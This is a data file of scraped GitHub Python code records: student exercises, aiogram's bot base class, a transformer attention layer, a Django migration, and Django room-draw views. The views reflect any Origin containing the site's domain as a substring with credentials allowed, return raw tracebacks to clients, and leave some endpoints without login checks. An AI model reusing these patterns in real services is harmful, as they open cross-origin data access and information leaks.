    user_index_dict = root_path + 'u2index.txt'\n    item_index_dict = root_path + 'i2index.txt'\n    combined_data = root_path + 'ratings.txt'\n    output_root_name = root_path + 'scene_1/'\n\n    # # Create the implicit and explicit files\n    # gen_cleaned_data(data_path, cleaned_implicit_data_path, cleaned_explicit_data_path)\n    # logging.info('--> Done, gen_cleaned_data')\n\n    # # Re-number users and items; users with fewer than 5 interactions in the implicit file are removed\n    # # Build the data so that every explicit interaction is guaranteed to have an implicit one\n    # data_preparation.gen_ratings_data_with_explicit(cleaned_implicit_data_path, cleaned_explicit_data_path,\n    #                                                 user_index_dict, item_index_dict, combined_data)\n    # logging.info('--> Done, gen_ratings_data_with_explicit')\n    #\n    # # div train test data with explicit\n    # data_preparation.div_train_test_data_with_explicit(combined_data, output_root_name)\n    # logging.info('--> Done, div_train_test_data_with_explicit')\n\n    subprocess.call(['bash', 'bin/split.sh', output_root_name])\n    logging.info(\"--> Done, split_train_data_into_partition\")\n\n\nif __name__ == '__main__':\n    main()\n    # construct_pcat_repr()\n","repo_name":"tranquyenbk173/BERT_ITE","sub_path":"src/data_preparation/retailrocket_data.py","file_name":"retailrocket_data.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"3058592849","text":"# NIM/Name\t \t: 16520002/Eraraya Morenzo Muten\n# Date\t \t : 17 November 2020\n# Class \t : 16\n# Description\t\t : Subprogram that prints the indices and contents of an array\n \n\n# Exercise 5\n\n# Array Printing Program\n\n# GLOBAL DECLARATIONS\n# N : integer\n# T : array\n\n# ALGORITHM\ndef CetakArray(jmlh, array): # the CetakArray function takes two parameters\n\n    # LOCAL PROCEDURE DECLARATIONS\n    # jmlh : integer\n    # array : array\n\n    # PROCEDURE ALGORITHM\n    for i in range(jmlh): # loop N times\n        print(\"[\"+str(i)+\"] \"+str(array[i])) # print each index and element value\n\n# GLOBAL ALGORITHM\nN = int(input(\"Enter the value of N: \")) # declare N as the length of the array\nT = [0 for i in range(N)] # declare T as the array\n\nfor i in range(N): # loop N times to fill the array\n    T[i]=int(input(\"Enter element \"+str(i)+\": \")) # fill each array element from user input\n\nCetakArray(N, T) # run CetakArray with arguments N and T","repo_name":"morenzoe/KU1102_Introduction_to_Computation","sub_path":"Daily_Assignments/Function/Latihan_Prosedur.py","file_name":"Latihan_Prosedur.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37387256202","text":"import asyncio\nimport contextlib\nimport io\nimport os\nimport pathlib\nimport ssl\nimport typing\nimport warnings\nfrom contextvars import ContextVar\nfrom typing import Dict, List, Optional, Union, Type\n\nimport aiohttp\nimport certifi\nfrom aiohttp.helpers import sentinel\n\nfrom . import api\nfrom .api import TelegramAPIServer, TELEGRAM_PRODUCTION\nfrom ..types import ParseMode, base\nfrom ..utils import json\nfrom ..utils.auth_widget import check_integrity\nfrom ..utils.deprecated import deprecated\n\n\nclass BaseBot:\n    \"\"\"\n    Base class for bot. 
It's raw bot.\n \"\"\"\n _ctx_timeout = ContextVar('TelegramRequestTimeout')\n _ctx_token = ContextVar('BotDifferentToken')\n\n def __init__(\n self,\n token: base.String,\n loop: Optional[Union[asyncio.BaseEventLoop, asyncio.AbstractEventLoop]] = None,\n connections_limit: Optional[base.Integer] = None,\n proxy: Optional[base.String] = None,\n proxy_auth: Optional[aiohttp.BasicAuth] = None,\n validate_token: Optional[base.Boolean] = True,\n parse_mode: typing.Optional[base.String] = None,\n disable_web_page_preview: Optional[base.Boolean] = None,\n timeout: typing.Optional[typing.Union[base.Integer, base.Float, aiohttp.ClientTimeout]] = None,\n server: TelegramAPIServer = TELEGRAM_PRODUCTION\n ):\n \"\"\"\n Instructions how to get Bot token is found here: https://core.telegram.org/bots#3-how-do-i-create-a-bot\n\n :param token: token from @BotFather\n :type token: :obj:`str`\n :param loop: event loop\n :type loop: Optional Union :obj:`asyncio.BaseEventLoop`, :obj:`asyncio.AbstractEventLoop`\n :param connections_limit: connections limit for aiohttp.ClientSession\n :type connections_limit: :obj:`int`\n :param proxy: HTTP proxy URL\n :type proxy: :obj:`str`\n :param proxy_auth: Authentication information\n :type proxy_auth: Optional :obj:`aiohttp.BasicAuth`\n :param validate_token: Validate token.\n :type validate_token: :obj:`bool`\n :param parse_mode: You can set default parse mode\n :type parse_mode: :obj:`str`\n :param disable_web_page_preview: You can set default disable web page preview parameter\n :type disable_web_page_preview: :obj:`bool`\n :param timeout: Request timeout\n :type timeout: :obj:`typing.Optional[typing.Union[base.Integer, base.Float, aiohttp.ClientTimeout]]`\n :param server: Telegram Bot API Server endpoint.\n :type server: :obj:`TelegramAPIServer`\n :raise: when token is invalid throw an :obj:`aiogram.utils.exceptions.ValidationError`\n \"\"\"\n self._main_loop = loop\n\n # Authentication\n if validate_token:\n api.check_token(token)\n self._token = None\n self.__token = token\n self.id = int(token.split(sep=':')[0])\n self.server = server\n\n self.proxy = proxy\n self.proxy_auth = proxy_auth\n\n # aiohttp main session\n ssl_context = ssl.create_default_context(cafile=certifi.where())\n\n self._session: Optional[aiohttp.ClientSession] = None\n self._connector_class: Type[aiohttp.TCPConnector] = aiohttp.TCPConnector\n self._connector_init = dict(limit=connections_limit, ssl=ssl_context)\n\n if isinstance(proxy, str) and (proxy.startswith('socks5://') or proxy.startswith('socks4://')):\n from aiohttp_socks import SocksConnector\n from aiohttp_socks.utils import parse_proxy_url\n\n socks_ver, host, port, username, password = parse_proxy_url(proxy)\n if proxy_auth:\n if not username:\n username = proxy_auth.login\n if not password:\n password = proxy_auth.password\n\n self._connector_class = SocksConnector\n self._connector_init.update(\n socks_ver=socks_ver, host=host, port=port,\n username=username, password=password, rdns=True,\n )\n self.proxy = None\n self.proxy_auth = None\n\n self._timeout = None\n self.timeout = timeout\n\n self.parse_mode = parse_mode\n\n self.disable_web_page_preview = disable_web_page_preview\n\n async def get_new_session(self) -> aiohttp.ClientSession:\n return aiohttp.ClientSession(\n connector=self._connector_class(**self._connector_init),\n json_serialize=json.dumps\n )\n\n @property\n def loop(self) -> Optional[asyncio.AbstractEventLoop]:\n return self._main_loop\n\n async def get_session(self) -> Optional[aiohttp.ClientSession]:\n if 
self._session is None or self._session.closed:\n self._session = await self.get_new_session()\n\n if not self._session._loop.is_running(): # NOQA\n # Hate `aiohttp` devs because it juggles event-loops and breaks already opened session\n # So... when we detect a broken session need to fix it by re-creating it\n # @asvetlov, if you read this, please no more juggle event-loop inside aiohttp, it breaks the brain.\n await self._session.close()\n self._session = await self.get_new_session()\n\n return self._session\n\n @property\n @deprecated(\n reason=\"Client session should be created inside async function, use `await bot.get_session()` instead\",\n stacklevel=3,\n )\n def session(self) -> Optional[aiohttp.ClientSession]:\n return self._session\n\n @staticmethod\n def _prepare_timeout(\n value: typing.Optional[typing.Union[base.Integer, base.Float, aiohttp.ClientTimeout]]\n ) -> typing.Optional[aiohttp.ClientTimeout]:\n if value is None or isinstance(value, aiohttp.ClientTimeout):\n return value\n return aiohttp.ClientTimeout(total=value)\n\n @property\n def timeout(self):\n timeout = self._ctx_timeout.get(self._timeout)\n if timeout is None:\n return sentinel\n return timeout\n\n @timeout.setter\n def timeout(self, value):\n self._timeout = self._prepare_timeout(value)\n\n @timeout.deleter\n def timeout(self):\n self.timeout = None\n\n @contextlib.contextmanager\n def request_timeout(self, timeout: typing.Union[base.Integer, base.Float, aiohttp.ClientTimeout]):\n \"\"\"\n Context manager implements opportunity to change request timeout in current context\n\n :param timeout: Request timeout\n :type timeout: :obj:`typing.Optional[typing.Union[base.Integer, base.Float, aiohttp.ClientTimeout]]`\n :return:\n \"\"\"\n timeout = self._prepare_timeout(timeout)\n token = self._ctx_timeout.set(timeout)\n try:\n yield\n finally:\n self._ctx_timeout.reset(token)\n\n @property\n def __token(self):\n return self._ctx_token.get(self._token)\n\n @__token.setter\n def __token(self, value):\n self._token = value\n\n @contextlib.contextmanager\n def with_token(self, bot_token: base.String, validate_token: Optional[base.Boolean] = True):\n if validate_token:\n api.check_token(bot_token)\n token = self._ctx_token.set(bot_token)\n try:\n yield\n finally:\n self._ctx_token.reset(token)\n\n @deprecated(\"This method's behavior will be changed in aiogram v3.0. 
\"\n \"More info: https://core.telegram.org/bots/api#close\", stacklevel=3)\n async def close(self):\n \"\"\"\n Close all client sessions\n \"\"\"\n if self._session:\n await self._session.close()\n\n async def request(self, method: base.String,\n data: Optional[Dict] = None,\n files: Optional[Dict] = None, **kwargs) -> Union[List, Dict, base.Boolean]:\n \"\"\"\n Make an request to Telegram Bot API\n\n https://core.telegram.org/bots/api#making-requests\n\n :param method: API method\n :type method: :obj:`str`\n :param data: request parameters\n :type data: :obj:`dict`\n :param files: files\n :type files: :obj:`dict`\n :return: result\n :rtype: Union[List, Dict]\n :raise: :obj:`aiogram.exceptions.TelegramApiError`\n \"\"\"\n\n return await api.make_request(await self.get_session(), self.server, self.__token, method, data, files,\n proxy=self.proxy, proxy_auth=self.proxy_auth, timeout=self.timeout, **kwargs)\n\n async def download_file(\n self,\n file_path: base.String,\n destination: Optional[Union[base.InputFile, pathlib.Path]] = None,\n timeout: Optional[base.Integer] = sentinel,\n chunk_size: Optional[base.Integer] = 65536,\n seek: Optional[base.Boolean] = True,\n destination_dir: Optional[Union[str, pathlib.Path]] = None,\n make_dirs: Optional[base.Boolean] = True,\n ) -> Union[io.BytesIO, io.FileIO]:\n \"\"\"\n Download file by file_path to destination file or directory\n\n if You want to automatically create destination (:class:`io.BytesIO`) use default\n value of destination and handle result of this method.\n\n At most one of these parameters can be used: :param destination:, :param destination_dir:\n\n :param file_path: file path on telegram server (You can get it from :obj:`aiogram.types.File`)\n :type file_path: :obj:`str`\n :param destination: filename or instance of :class:`io.IOBase`. For e. g. 
:class:`io.BytesIO`\n :param timeout: Integer\n :param chunk_size: Integer\n :param seek: Boolean - go to start of file when downloading is finished.\n :param destination_dir: directory for saving files\n :param make_dirs: Make dirs if not exist\n :return: destination\n \"\"\"\n if destination and destination_dir:\n raise ValueError(\n \"Use only one of the parameters:destination or destination_dir.\"\n )\n\n if destination is None and destination_dir is None:\n destination = io.BytesIO()\n\n elif destination_dir:\n destination = os.path.join(destination_dir, file_path)\n\n if make_dirs and not isinstance(destination, io.IOBase) and os.path.dirname(destination):\n os.makedirs(os.path.dirname(destination), exist_ok=True)\n\n url = self.get_file_url(file_path)\n\n dest = destination if isinstance(destination, io.IOBase) else open(destination, 'wb')\n session = await self.get_session()\n async with session.get(\n url,\n timeout=timeout,\n proxy=self.proxy,\n proxy_auth=self.proxy_auth,\n raise_for_status=True,\n ) as response:\n while True:\n chunk = await response.content.read(chunk_size)\n if not chunk:\n break\n dest.write(chunk)\n dest.flush()\n if seek:\n dest.seek(0)\n return dest\n\n def get_file_url(self, file_path):\n return self.server.file_url(token=self.__token, path=file_path)\n\n async def send_file(self, file_type, method, file, payload) -> Union[Dict, base.Boolean]:\n \"\"\"\n Send file\n\n https://core.telegram.org/bots/api#inputfile\n\n :param file_type: field name\n :param method: API method\n :param file: String or io.IOBase\n :param payload: request payload\n :return: response\n \"\"\"\n if file is None:\n files = {}\n elif isinstance(file, str):\n # You can use file ID or URL in the most of requests\n payload[file_type] = file\n files = None\n else:\n files = {file_type: file}\n\n return await self.request(method, payload, files)\n\n @property\n def parse_mode(self):\n return getattr(self, '_parse_mode', None)\n\n @parse_mode.setter\n def parse_mode(self, value):\n if value is None:\n setattr(self, '_parse_mode', None)\n else:\n if not isinstance(value, str):\n raise TypeError(f\"Parse mode must be str, not {type(value)}\")\n value = value.lower()\n if value not in ParseMode.all():\n raise ValueError(f\"Parse mode must be one of {ParseMode.all()}\")\n setattr(self, '_parse_mode', value)\n if value == 'markdown':\n warnings.warn(\"Parse mode `Markdown` is legacy since Telegram Bot API 4.5, \"\n \"retained for backward compatibility. 
Use `MarkdownV2` instead.\\n\"\n \"https://core.telegram.org/bots/api#markdown-style\", stacklevel=3)\n\n @parse_mode.deleter\n def parse_mode(self):\n self.parse_mode = None\n\n @property\n def disable_web_page_preview(self):\n return getattr(self, '_disable_web_page_preview', None)\n\n @disable_web_page_preview.setter\n def disable_web_page_preview(self, value):\n if value is None:\n setattr(self, '_disable_web_page_preview', None)\n else:\n if not isinstance(value, bool):\n raise TypeError(f\"Disable web page preview must be bool, not {type(value)}\")\n setattr(self, '_disable_web_page_preview', value)\n\n @disable_web_page_preview.deleter\n def disable_web_page_preview(self):\n self.disable_web_page_preview = None\n\n def check_auth_widget(self, data):\n return check_integrity(self.__token, data)\n","repo_name":"prooxyyy/support-bot","sub_path":"venv/Lib/site-packages/aiogram/bot/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":13552,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"35"} +{"seq_id":"44511737426","text":"from django.http import HttpResponse, HttpResponseForbidden, HttpResponseRedirect\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.template import RequestContext\nfrom dsml import gdi\n# from rooms.models import Poll\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom models import *\nfrom views import *\nfrom django.core.urlresolvers import reverse\nfrom django.core.mail import send_mail\nfrom django import forms\nimport json\nimport sys,os\nimport traceback\n\nfrom simulation import start_sim, stop_sim, check_avail\nfrom queue import *\n\n\nREAL_TIME_ADDR='http://dev.rooms.tigerapps.org:8031'\nNORMAL_ADDR='http://dev.rooms.tigerapps.org'\nBASE_DOMAIN='rooms.tigerapps.org'\n\ndef externalResponse(data):\n response = HttpResponse(data)\n response['Access-Control-Allow-Origin'] = NORMAL_ADDR\n response['Access-Control-Allow-Credentials'] = \"true\"\n return response\n\n\ndef externalize(request, response):\n response['Access-Control-Allow-Credentials'] = \"true\"\n response['Access-Control-Allow-Origin'] = NORMAL_ADDR\n if 'HTTP_ORIGIN' in request.META:\n origin = request.META['HTTP_ORIGIN']\n if origin.find(BASE_DOMAIN) != -1:\n response['Access-Control-Allow-Origin'] = origin\n return response\n\ndef check_undergraduate(username):\n # Check if user can be here\n try:\n user = User.objects.get(netid=username)\n except:\n info = gdi(username)\n user = User(netid=username, firstname=info.get('givenName'), lastname=info.get('sn'), pustatus=info.get('pustatus'))\n if info.get('puclassyear'):\n user.puclassyear = int(info.get('puclassyear'))\n if user.pustatus == 'undergraduate' and 2011 < user.puclassyear:\n user.save()\n #Create queues for each draw\n for draw in Draw.objects.all():\n queue = Queue(draw=draw)\n queue.save()\n user.queues.add(queue)\n if user.pustatus == 'undergraduate' and 2011 < user.puclassyear:\n return user\n return None\n\n\n##################\n# Real-time view functions go here (long polling)\n \n@login_required\ndef update_queue(request, drawid):\n user = check_undergraduate(request.user.username)\n if not user:\n return externalResponse('forbidden')\n draw = Draw.objects.get(pk=drawid)\n qlist = json.loads(request.POST['queue'])\n # resp = ''\n # for r in qlist:\n # resp += ' ' + r;\n queue = user.queues.filter(draw=draw)[0]\n if not queue:\n return externalResponse('no 
queue')\n\n # QueueManager object takes over\n # rooms = []\n # for roomid in qlist:\n # room = Room.objects.get(pk=roomid)\n # if (not room) or not draw in room.building.draw.all():\n # return externalResponse('bad room/draw')\n # rooms.append(room)\n # # Clear out the old list\n # queue.queuetoroom_set.all().delete()\n # # Put in new relationships\n # for i in range(0, len(rooms)):\n # qtr = QueueToRoom(queue=queue, room=rooms[i], ranking=i)\n # qtr.save()\n # # Test output - list rooms\n # return externalResponse(rooms)\n try:\n return externalize(request, edit(user, queue, qlist, draw))\n except Exception as e:\n return externalResponse(e)\n\n# Ajax for displaying this user's queue\n@login_required\ndef get_queue(request, drawid, timestamp = 0):\n user = check_undergraduate(request.user.username)\n timestamp = int(timestamp)\n if not user:\n return externalResponse('no user')\n try:\n draw = Draw.objects.get(pk=drawid)\n queue = user.queues.get(draw=draw)\n except Exception as e:\n return externalResponse(traceback.format_exc(2) + str(draw))\n #real-time takes over\n# return externalResponse(queue)\n try:\n return externalize(request, check(user, queue, timestamp))\n except Exception as e:\n return externalResponse(traceback.format_exc(2))\n \n\n # queueToRooms = QueueToRoom.objects.filter(queue=queue).order_by('ranking')\n # if not queueToRooms:\n # return HttpResponse('')\n # room_list = []\n # for qtr in queueToRooms:\n # room_list.append(qtr.room)\n # return render_to_response('rooms/queue.html', {'room_list':room_list})\n\n\ndef start_simulation(request, delay, size=1):\n delay = int(delay)\n size = int(size)\n return start_sim(delay, size)\n\ndef stop_simulation(request):\n return stop_sim()\n\ndef check_availability(request, timestamp):\n return externalize(request, check_avail(int(timestamp)))\n","repo_name":"rclmenezes/USG-srv-dev","sub_path":"tigerapps/rooms/real_time_views.py","file_name":"real_time_views.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
{"seq_id":"31299474244","text":"#QUICK AND DIRTY CODE, I didn't feel like doing this task any better\n\ndef dayOfProgrammer(year):\n    leap=0\n    day=256\n    if year==1918:\n        day+=13\n    if year<=1917:\n        if year%4==0:\n            leap=1\n    else:\n        if (year%400==0) or (year%4==0 and year%100!=0):\n            leap=1\n    days_from_start_to_month_end=(31,59,90,120,151,181,212,243,273,304,334,365)\n    for position,month in enumerate(days_from_start_to_month_end):\n        if day>=month and day= coins[j] and dp[i - coins[j]] != float(\"inf\"):\n                    dp[i] = min(dp[i - coins[j]] + 1, dp[i])\n\n        if dp[amount] == float(\"inf\"):\n            dp[amount] = -1\n        return dp[amount]\n\n\nclass Solution1:\n    def coinChange(self, coins: List[int], amount: int):\n        dp = [float(\"inf\")] * (amount + 1)\n        dp[0] = 0\n        for j in range(len(coins)):\n            for i in range(coins[j], amount + 1):\n                dp[i] = min(dp[i - coins[j]] + 1, dp[i])\n        if dp[amount] == float(\"inf\"):\n            dp[amount] = -1\n        return dp[amount]\n\n\nif __name__ == \"__main__\":\n    arr, amount = [1, 2, 5], 11\n    A = Solution1()\n    print(A.coinChange(arr, amount))\n","repo_name":"wenhaoliang/leetcode","sub_path":"newcoder/动态规划/打印最少的硬币组合.py","file_name":"打印最少的硬币组合.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"35479406101","text":"import math\nimport torch\nimport torch.nn as nn\n\n\nclass MultiHeadedAttention(nn.Module):\n    \"\"\"\n    Each head is a self-attention 
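# A compact cross-check of the bottom-up recurrence used in the coinChange
# record above, using the record's own inputs coins=[1, 2, 5], amount=11:
# dp[i] = min(dp[i - c] + 1 over usable coins c), dp[0] = 0, so
# dp[5] = 1, dp[10] = 2, dp[11] = dp[10] + 1 = 3 (i.e. 5 + 5 + 1),
# matching the script's printed result.
def min_coins(coins, amount):
    INF = float("inf")
    dp = [0] + [INF] * amount
    for i in range(1, amount + 1):
        dp[i] = min((dp[i - c] + 1 for c in coins if c <= i), default=INF)
    return -1 if dp[amount] == INF else dp[amount]

assert min_coins([1, 2, 5], 11) == 3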
operation.\n    self-attention refers to https://arxiv.org/pdf/1706.03762.pdf\n    \"\"\"\n    # hidden_size: hidden feature size\n    # heads_num: number of attention heads\n    # attention_head_size: feature size of each head\n    # with_scale : / sqrt(d)\n    def __init__(self, hidden_size, heads_num, attention_head_size, dropout, has_bias=True, with_scale = True):\n        super(MultiHeadedAttention, self).__init__()\n        self.heads_num = heads_num\n\n        self.per_head_size = attention_head_size\n        self.with_scale = with_scale\n        self.inner_hidden_size = heads_num * attention_head_size\n\n        # Three linear layers that project Q, K and V separately\n        self.linear_layers = nn.ModuleList(\n            [nn.Linear(hidden_size, self.inner_hidden_size, bias=has_bias) for _ in range(3)]\n        )\n        \n        self.dropout = nn.Dropout(dropout)\n        # Final linear projection\n        self.final_linear = nn.Linear(self.inner_hidden_size, hidden_size, bias=has_bias)\n\n    # has_residual_attention: whether residual attention is enabled\n    # prev_attn: the attention scores from the previous layer; the current scores are combined with them as a residual\n\n    def forward(self, key, value, query, mask, position_bias=None, has_residual_attention=False, prev_attn=None):\n        \"\"\"\n        Args:\n            key: [batch_size x seq_length x hidden_size]\n            value: [batch_size x seq_length x hidden_size]\n            query: [batch_size x seq_length x hidden_size]\n            mask: [batch_size x 1 (or heads_num) x seq_length x seq_length]\n            position_bias: [1 x heads_num x seq_length x seq_length]  # positional bias added to the scores; the leading 1 broadcasts over the batch\n        Returns:\n            output: [batch_size x seq_length x hidden_size]\n        \"\"\"\n        batch_size, seq_length, _ = query.size()\n        heads_num = self.heads_num\n        per_head_size = self.per_head_size\n\n        def shape(x):\n            return x. \\\n                contiguous(). \\\n                view(batch_size, seq_length, heads_num, per_head_size). \\\n                transpose(1, 2)\n\n        def unshape(x):\n            return x. \\\n                transpose(1, 2). \\\n                contiguous(). \\\n                view(batch_size, seq_length, self.inner_hidden_size)\n\n\n        # Apply the linear projections to Q, K and V\n        # (batch_size, seq_length, hidden_size)\n        # -> (batch_size, seq_length, inner_hidden_size)\n        # -> (batch_size, seq_length, inner_hidden_size)\n\n        query, key, value = [l(x). \\\n                             view(batch_size, -1, heads_num, per_head_size). \\\n                             transpose(1, 2) \\\n                             for l, x in zip(self.linear_layers, (query, key, value))\n                             ]\n\n        scores = torch.matmul(query, key.transpose(-2, -1))\n        if position_bias is not None:\n            scores = scores + position_bias\n        if self.with_scale:\n            scores = scores / math.sqrt(float(per_head_size))\n\n        # Why is the mask added rather than multiplied? Because -inf entries are more effective when the scores go through Softmax normalization\n        scores = scores + mask.type_as(scores)\n        prev_attn_out = None\n        if has_residual_attention:  # residual attention\n            if prev_attn is not None:\n                scores += prev_attn\n            prev_attn_out = scores\n        probs = nn.Softmax(dim=-1)(scores)\n        probs = self.dropout(probs)\n        # (batch_size, heads_num, seq_length, per_head_size)\n        # -> (batch_size, seq_length, heads_num, per_head_size) -> (batch_size, seq_length, heads_num * per_head_size)\n        # -> (batch_size, seq_length, inner_hidden_size)\n        output = unshape(torch.matmul(probs, value))\n\n        # Final projection of the concatenated heads\n        output = self.final_linear(output)\n        return output, prev_attn_out\n","repo_name":"KKinder82/UER-py","sub_path":"uer/layers/multi_headed_attn.py","file_name":"multi_headed_attn.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"111950500","text":"#--------------------------\n#Title: Specified size grid\n#Description: Print grids according to user's specifications\n#Original Dev: Lee Deitesfeld\n#Change Log:\n#20190331LAD Created function\n#--------------------------\n\ndef print_grid2(x, y):\n    '''Prints grid according to user's size specifications (LxW).'''\n    pipe = '|'\n    spaces = ' '*y\n    plus = '+'\n    hyphens = '-'*y\n\n    mult_hyphens = (plus + hyphens)*x\n    mult_spaces = (pipe + spaces)*x\n\n    #prints one line with hyphens and plus signs\n    print(mult_hyphens + plus)\n\n    #prints rest of grid\n    for i in range(x):\n        #prints multiple lines with pipes and spaces\n        for i in range(y):\n            print(mult_spaces + pipe)\n\n        print(mult_hyphens + plus)\n","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/lee_deitesfeld/lesson02/print_grid2.py","file_name":"print_grid2.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"}
{"seq_id":"35286912276","text":"N = int(input())\n\nlista = []\nfor _ in range(N):\n    posicoes = list(map(int, input().split()))\n    lista.append(posicoes)\nprint(lista)\nfor s in range(N):\n    lista1 = []\n    for w in range(N):\n        if w != s:\n            resultado = ((lista[w][0] - lista[s][0]) ** 2 + (lista[w][1] - lista[s][1]) ** 2 + (lista[w][2] - lista[s][2]) ** 2) ** 0.5\n            lista1.append(resultado)\n    num = min(lista1)\n\n    if num < 20:\n        print('A')\n    elif num >= 20 and num < 50:\n        print('M')\n    elif num >= 50:\n        print('B')\n","repo_name":"Pedro-Edi/PEOO_2023","sub_path":"lista04B/exe7.py","file_name":"exe7.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"19282090270","text":"from django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n        ('contenttypes', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='BlacklistIP',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('ip', models.CharField(unique=True, max_length=40)),\n            ],\n            options={\n                'db_table': 'hitcount_blacklist_ip',\n                'verbose_name': 'Blacklisted IP',\n                'verbose_name_plural': 'Blacklisted IPs',\n            },\n            bases=(models.Model,),\n        ),\n        migrations.CreateModel(\n            name='BlacklistUserAgent',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('user_agent', 
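# A minimal usage sketch for the MultiHeadedAttention module in the record
# above, assuming hidden_size = heads_num * attention_head_size, as the
# module's own reshapes require. The mask is *added* to the scores, so an
# all-zero mask attends everywhere; large negative entries would suppress
# positions before the softmax.
import torch

batch_size, seq_length, hidden_size, heads_num = 2, 5, 64, 4
attn = MultiHeadedAttention(hidden_size, heads_num, hidden_size // heads_num, dropout=0.1)
x = torch.randn(batch_size, seq_length, hidden_size)
mask = torch.zeros(batch_size, 1, seq_length, seq_length)
out, _ = attn(key=x, value=x, query=x, mask=mask)
assert out.shape == (batch_size, seq_length, hidden_size)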
models.CharField(unique=True, max_length=255)),\n ],\n options={\n 'db_table': 'hitcount_blacklist_user_agent',\n 'verbose_name': 'Blacklisted User Agent',\n 'verbose_name_plural': 'Blacklisted User Agents',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Hit',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', models.DateTimeField(auto_now_add=True, db_index=True)),\n ('ip', models.CharField(max_length=40, editable=False)),\n ('session', models.CharField(max_length=40, editable=False)),\n ('user_agent', models.CharField(max_length=255, editable=False)),\n ],\n options={\n 'ordering': ('-created',),\n 'get_latest_by': 'created',\n 'verbose_name': 'hit',\n 'verbose_name_plural': 'hits',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='HitCount',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('hits', models.PositiveIntegerField(default=0)),\n ('modified', models.DateTimeField(auto_now=True)),\n ('object_pk', models.PositiveIntegerField(verbose_name='object ID')),\n ('content_type', models.ForeignKey(related_name='content_type_set_for_hitcount',\n to='contenttypes.ContentType', on_delete=models.CASCADE)),\n ],\n options={\n 'get_latest_by': 'modified',\n 'ordering': ('-hits',),\n 'verbose_name_plural': 'hit counts',\n 'db_table': 'hitcount_hit_count',\n 'verbose_name': 'hit count',\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='hitcount',\n unique_together=('content_type', 'object_pk'),\n ),\n migrations.AddField(\n model_name='hit',\n name='hitcount',\n field=models.ForeignKey(editable=False, to='hitcount.HitCount', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='hit',\n name='user',\n field=models.ForeignKey(editable=False, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE),\n preserve_default=True,\n ),\n ]\n","repo_name":"thornomad/django-hitcount","sub_path":"hitcount/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":449,"dataset":"github-code","pt":"35"} +{"seq_id":"17699431430","text":"# Name: Moustafa Eid\n# Date: April 27th 2017\n# Class: ICS3U1-03\n# Description: Checks how many times a number is divisible by 2\n\n#Input to check for a number\nnum1 = int(input(\"Please enter a number: \"))\n\n#declaring variables\nnumout = num1\ncount = 0\n\n#While loop that checks if a number is divisible by 2 then checks if its quotient is also divisible by 2 \nwhile (True):\n if num1 % 2 == 0:\n num1 = num1 / 2\n count += 1\n else:\n break\n\n#Prints output for program\nprint (\"\\n%i is divisible by 2, %i times.\" % (numout, count))\n","repo_name":"Moustafa-Eid/Python-Programs","sub_path":"Unit 3/While loops/WhileLoopsEx4.py","file_name":"WhileLoopsEx4.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34351559005","text":"import pandas as pd\nimport numpy as np\nimport os,sys\nfrom mlpipeline.exception import CustomException\nfrom mlpipeline.logger import logging\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.impute import SimpleImputer\nfrom mlpipeline.config.configuration import ConfigurationManager\nfrom mlpipeline.entity.config_entity import DataTransformationConfig,DataIngestionConfig\nfrom 
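# A bit-twiddling equivalent of the halving loop in the record above, assuming
# n > 0: n & -n isolates the lowest set bit, so its bit_length minus one is
# exactly how many times n is divisible by 2.
def twos_in(n):
    return (n & -n).bit_length() - 1

assert twos_in(40) == 3  # 40 = 2**3 * 5, the same count the loop prints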
